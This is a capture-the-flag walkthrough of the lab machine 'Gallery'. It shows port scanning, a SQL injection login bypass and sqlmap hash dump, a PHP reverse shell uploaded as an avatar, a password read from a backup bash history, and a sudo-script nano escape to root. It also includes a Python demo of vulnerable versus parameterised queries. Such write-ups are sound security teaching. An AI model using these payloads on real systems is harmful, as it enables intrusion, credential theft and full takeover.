# Gallery

## Nmap

```
nmap 10.10.40.100 -p- -sS -sV

PORT     STATE    SERVICE VERSION
53/tcp   filtered domain
80/tcp   open     http    Apache httpd 2.4.29 ((Ubuntu))
8080/tcp open     http    Apache httpd 2.4.29 ((Ubuntu))
```

Starting out on port 80 we have the Apache2 Default Page.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FKsFsYOwLV6bwQHtvL8xr%2Fimage.png?alt=media\&token=1919d341-8733-4bf2-becf-1d33db7ba838)

Running `feroxbuster` against the target web server turns up a `/gallery` directory among the results.

```
feroxbuster -u http://10.10.40.100 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fkb20sBgBvwKl56WUAcL2%2Fimage.png?alt=media\&token=dc582b3a-86d5-42ca-a65f-b568e08a8f87)

Checking the gallery directory we are redirected to `/gallery/login.php`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F7f9VYTOG4ez4VBJPAaTg%2Fimage.png?alt=media\&token=d2b0108d-5904-4706-90c3-d3040041dd38)

Attempting a login with a simple set of credentials and inspecting the exchange in the ZAP web proxy, we notice that the response to the logon contains a SQL error, which tells us our input is reaching the database query.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FJnR0n20YY39E3YX5xwyd%2Fimage.png?alt=media\&token=45e66426-f3fd-4960-9780-1e4d10cc26f7)

Knowing the login query is built from our input, we can try some simple SQL injection on the login page.

Logging in with `' OR 1=1 -- -` as both the username and password proves successful: the injected `OR 1=1` makes the `WHERE` clause match every row, and the trailing `-- ` comments out the rest of the query, password check included.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F0vGhwrcbKz2DzCyP5L9R%2Fimage.png?alt=media\&token=d0a596d0-601a-41ea-924a-202200e0285d)
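The two observations above (a stray quote producing a SQL error, and `' OR 1=1 -- -` logging us in) come from the same root cause. The following is an added example, not the gallery application's code: an in-memory SQLite stand-in for the users table (the constructed rows and schema are assumptions, the real schema is not on this page) with a login function that splices input into the query text, beside the parameterised version that treats the payload as a literal string.

```python
import sqlite3

# Constructed sample data standing in for the gallery's users table; the real
# schema on the box is not shown on this page (assumption).
SAMPLE_USERS = [("admin", "S3cret!"), ("mike", "hunter2")]

PAYLOAD = "' OR 1=1 -- -"


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database seeded with the constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """The injectable pattern: user input spliced straight into the SQL text."""
    return (
        "SELECT username FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )


def login_vulnerable(conn, username, password):
    """Returns the matched username, or None. Raises sqlite3.OperationalError
    when the input breaks the query syntax (the error seen in the proxy)."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_fixed(conn, username, password):
    """Parameterised query: the payload is compared as a literal string."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def leaks_sql_error(conn, username):
    """True when a stray quote makes the back end throw a SQL syntax error,
    the tell that input reaches the query unescaped."""
    try:
        login_vulnerable(conn, username, "x")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    # Shows the WHERE clause after injection: everything past "-- " is a comment.
    print(build_vulnerable_query(PAYLOAD, PAYLOAD))
    print("vulnerable:", login_vulnerable(db, PAYLOAD, PAYLOAD))  # admin
    print("fixed:", login_fixed(db, PAYLOAD, PAYLOAD))  # None
```

The vulnerable function returns the first row of the table, which is why this kind of bypass usually lands you in the first account created, typically the administrator. Note that MySQL needs whitespace after `--` for it to start a comment, which is why the payload carries the trailing ` -`; SQLite accepts `--` on its own.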

**Note:** We can also feed the raw proxy request to `sqlmap` to enumerate the database and dump the admin hash.

```
sqlmap -r ~/Desktop/request.raw --batch -D gallery_db -T users -C username,password --dump
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FCXjRzNFjctY0vzSTkX6q%2Fimage.png?alt=media\&token=7a4fb3c2-537e-470a-bc52-bf2f4f341212)

Back on the page we reached by bypassing the login, we notice that we can upload a new profile picture for the administrative user we are now logged in as.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FHWhcFZ9D3vjWYipioA9w%2Fimage.png?alt=media\&token=a65cf9bb-cb81-49e1-bdd9-9093a301e6cd)

Since the application is written in PHP (`login.php`), we upload a PHP reverse shell as the avatar.

**RevShells:** <https://www.revshells.com/>

I opted for the PHP PentestMonkey shell.

After uploading the shell we find it triggers our `netcat` listener immediately.

**Note:** If for any reason it does not trigger, we can right-click where the avatar should appear in the top right and choose "Open image in new tab" to request the uploaded file directly.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fk8hFwuPUyX01r3SJ9Gbu%2Fimage.png?alt=media\&token=7f258bac-5bc5-4b90-9749-223cdf9e54af)

Looking through `/var/backups` we find a directory named `mike_home_backup`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FnArQ5ovHFJv1v2kYIRrO%2Fimage.png?alt=media\&token=62492036-712a-4bc7-9ecd-deecb455a222)

Within it, `.bash_history` is readable by us and contains a potential password.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FnzETxxtVuZXsoVvaFxr6%2Fimage.png?alt=media\&token=b75692af-bb05-40b6-80b5-460987aaf488)

Using the credentials (altered slightly due to a typo in the history file) we are able to `su` to *mike*.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fbc58yBjTH56FGSPbnlcp%2Fimage.png?alt=media\&token=6399bb84-d185-4877-a25a-ac8495ca3c6f)

Where we can then read the `user.txt` flag in Mike's home directory.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FuMe9YZfdqtdhEpbZSOuC%2Fimage.png?alt=media\&token=94952939-d980-4fee-9399-e2806e865419)

Running `sudo -l` we see mike can run `/bin/bash /opt/rootkit.sh` as **root** without a password.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F38LoWhT7ZoVAL95Say69%2Fimage.png?alt=media\&token=b408061c-830d-470c-8003-304065592b59)

Reading the contents of `/opt/rootkit.sh` we see that it prompts for a command; `read` looks the most promising because it executes `nano`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FCeTRQIKRnfxig7FmqKBE%2Fimage.png?alt=media\&token=efe6f0c5-fa74-407d-a0d1-3c8e25ac35b2)

Looking at GTFOBins we see that `nano` can be escaped to run system commands.

**GTFOBins:** <https://gtfobins.github.io/gtfobins/nano/>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F3QtNewIhcge4RnBWlBxQ%2Fimage.png?alt=media\&token=678ba43b-d581-4b31-b51f-33d6020fbae7)

**Note:** I was unable to complete the privilege escalation initially, as the `nc` shell I was using was not stable enough to work over a TTY. `socat` is installed on the target system, and getting a reverse shell with `socat` as the user mike is highly recommended before completing the next steps.

When ready we execute `/opt/rootkit.sh` as root.

```
sudo -u root /bin/bash /opt/rootkit.sh
```

Then enter `read` at the interactive prompt, which drops us into a root `nano` session. Pressing `Ctrl+R` (Read File) followed by `Ctrl+X` (Execute Command) prompts for a command to run from within nano.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fp4Dfx0golhMtE1pVvicW%2Fimage.png?alt=media\&token=1299f5ac-11d7-4990-9443-7268ceb4df13)

Entering the command below escapes into a root shell and allows us to grab the **root** flag.

```
reset; sh 1>&0 2>&0
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FmpXCOJdyRlHlXdm1XsJ9%2Fimage.png?alt=media\&token=0098460e-7440-4d5b-b6b2-b970fb83c7dc)
